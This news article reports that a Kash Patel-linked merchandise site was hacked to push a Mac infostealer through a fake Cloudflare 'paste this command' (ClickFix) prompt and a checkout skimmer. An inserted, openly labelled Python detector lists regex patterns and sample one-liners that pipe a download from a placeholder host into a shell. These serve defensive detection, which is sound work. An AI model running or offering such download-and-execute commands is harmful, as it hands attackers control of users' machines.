Kash Patel-Linked Merchandise Site Goes Dark After Hack Allegedly Spread Malware to Visitors


A merchandise website linked to Kash Patel was taken offline Friday after reports emerged that hackers had compromised the platform and attempted to infect visitors’ devices with malware through a deceptive online prompt.

The site, Based Apparel, which sells “K$H”-branded merchandise tied to Patel, including patriotic clothing, books and accessories, reportedly went dark after cybersecurity concerns surfaced. Visitors on Friday were met with a message stating, “We’ll be right back,” while promising the online store would return “bolder than ever”.

The issue was first reported by Straight Arrow News, which said an X user identified as “debbie” flagged suspicious activity on the site after noticing signs of malware.

Debbie, who declined to be described as a cybersecurity expert and instead called herself a “big time nerd,” said the website appeared to be distributing an infostealer, malicious software designed to steal passwords, credentials and other sensitive information.

Fake Cloudflare Prompt Used to Spread Malware

As reported, visitors to the website encountered what looked like a legitimate Cloudflare verification page warning that their IP address had been flagged for “irregular web activity”.

Users were then instructed to copy a code and paste it into their computer's terminal, a social engineering tactic known as a ClickFix attack.

The copied command, however, allegedly contained hidden instructions that silently downloaded malware onto Mac devices without users realizing it.
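
A defensive check for the pattern described above, as an added example that is not from the original report: it flags pasted terminal commands that fetch or decode code and hand it straight to a shell. The rule set, function names and sample commands are assumptions constructed for illustration; the report does not give the actual command used on the site.

```python
import re

# Heuristic rules (assumptions chosen for this example, not indicators taken
# from the reported incident). Each matches a shape that lets a pasted
# one-liner fetch and run code the user never gets to read.
RULES = {
    "download_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "download_in_substitution": re.compile(
        r"(\$\(|`)\s*(curl|wget)\b"),
    "decoded_blob_to_shell": re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "output_silenced": re.compile(
        r">\s*/dev/null\s+2>&1|\bnohup\b"),
}

# Constructed sample commands; example.invalid is a reserved, non-resolving name.
SAMPLES = {
    "piped": "curl -fsSL https://example.invalid/verify | bash >/dev/null 2>&1 &",
    "substitution": 'bash -c "$(curl -fsSL https://example.invalid/check)"',
    "encoded": "echo 'ZWNobyBoaQ==' | base64 -d | sh",
    "benign_download": "curl -fsSL https://example.invalid/file.tgz -o file.tgz",
    "benign_install": "brew install wget",
}


def review_pasted_command(command: str) -> list[str]:
    """Return the names of the rules that a pasted command line triggers."""
    return [name for name, rx in RULES.items() if rx.search(command)]


def should_block(command: str) -> bool:
    """Block when code is fetched or decoded and handed straight to a shell.

    Silenced output alone is common in legitimate scripts, so it only adds
    context to a finding and never blocks by itself.
    """
    return bool(set(review_pasted_command(command)) - {"output_silenced"})


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        verdict = "BLOCK" if should_block(cmd) else "allow"
        print(f"{verdict:5} {label:16} {review_pasted_command(cmd)}")
```

A legitimate verification page never asks a visitor to run a command, so any hit on text copied from a "verify you are human" prompt is worth treating as malicious.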

A security researcher known online as “WifiRumHam,” who analyzed the code, told Straight Arrow News the malware was designed to collect browser cookies, passwords, login credentials, Apple Notes data and information tied to more than 200 cryptocurrency browser extensions.

The researcher also claimed to have identified a payment skimmer embedded in the site’s checkout process that could potentially capture credit card details.

The publication reported the breach may have stemmed from a malicious WordPress plugin installed by attackers, though how access to the site was initially gained remains unclear.

The FBI said Patel had “divested from any interest” in Based Apparel before becoming FBI director and does not profit from its sales. At the time of reporting, the bureau had declined to say whether it was investigating the incident.

The incident comes after an Iranian-linked hacker group reportedly leaked hundreds of emails from Patel’s private Gmail account in March, exposing personal documents and family photos. On its website, the hacker group Handala Hack Team claimed Patel had joined the list of victims it had successfully compromised.



Liam Redmond

As an editor at Forbes Europe, I specialize in exploring business innovations and entrepreneurial success stories. My passion lies in delivering impactful content that resonates with readers and sparks meaningful conversations.
